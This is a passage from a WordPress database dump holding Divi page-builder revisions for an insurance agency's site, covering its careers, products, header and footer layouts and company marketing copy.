column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" hover_enabled=\"0\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\" text_text_color=\"#2b2b2b\" sticky_enabled=\"0\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" hover_enabled=\"0\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\" text_text_color=\"#2b2b2b\" sticky_enabled=\"0\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" _dynamic_attributes=\"button_url\" sticky_enabled=\"0\" box_shadow_style_button=\"preset2\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 20:36:53','2023-04-08 20:36:53','',26,'http://cmdev-site1.com/?p=833',0,'revision','',0),(872,1,'2023-04-08 21:25:33','2023-04-08 21:25:33','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-08 21:25:33','2023-04-08 21:25:33','',38,'http://cmdev-site1.com/?p=872',0,'revision','',0),(830,1,'2023-04-08 20:28:59','2023-04-08 20:28:59','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\" custom_margin=\"||-2px|||\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Justin Conference 2 Cropped\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"100px||0px||false|false\" height=\"350px\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-08 20:28:59','2023-04-08 20:28:59','',38,'http://cmdev-site1.com/?p=830',0,'revision','',0),(828,1,'2023-04-08 20:23:48','2023-04-08 20:23:48','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" parallax=\"on\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" _dynamic_attributes=\"button_url\" sticky_enabled=\"0\" box_shadow_style_button=\"preset2\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 20:23:48','2023-04-08 20:23:48','',26,'http://cmdev-site1.com/?p=828',0,'revision','',0),(834,1,'2023-04-08 20:38:34','2023-04-08 20:38:34','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','final section','','publish','closed','closed','','final-section','','','2023-04-08 20:38:34','2023-04-08 20:38:34','',0,'http://cmdev-site1.com/et_pb_layout/final-section/',0,'et_pb_layout','',0),(835,1,'2023-04-08 20:39:03','2023-04-08 20:39:03','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" parallax=\"on\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','final section - paralax','','publish','closed','closed','','final-section-paralax','','','2023-04-08 20:39:03','2023-04-08 20:39:03','',0,'http://cmdev-site1.com/et_pb_layout/final-section-paralax/',0,'et_pb_layout','',0),(837,1,'2023-04-08 20:39:35','2023-04-08 20:39:35','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#FFFFFF|dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/privacy-policy/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-04-08 20:39:35','2023-04-08 20:39:35','',523,'http://cmdev-site1.com/?p=837',0,'revision','',0),(844,1,'2023-04-08 20:46:02','2023-04-08 20:46:02','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 20:46:02','2023-04-08 20:46:02','',528,'http://cmdev-site1.com/?p=844',0,'revision','',0),(840,1,'2023-04-08 20:41:41','2023-04-08 20:41:41','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" parallax=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" custom_padding=\"||0px||false|false\" sticky_enabled=\"0\" custom_margin=\"||-72px|||\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" 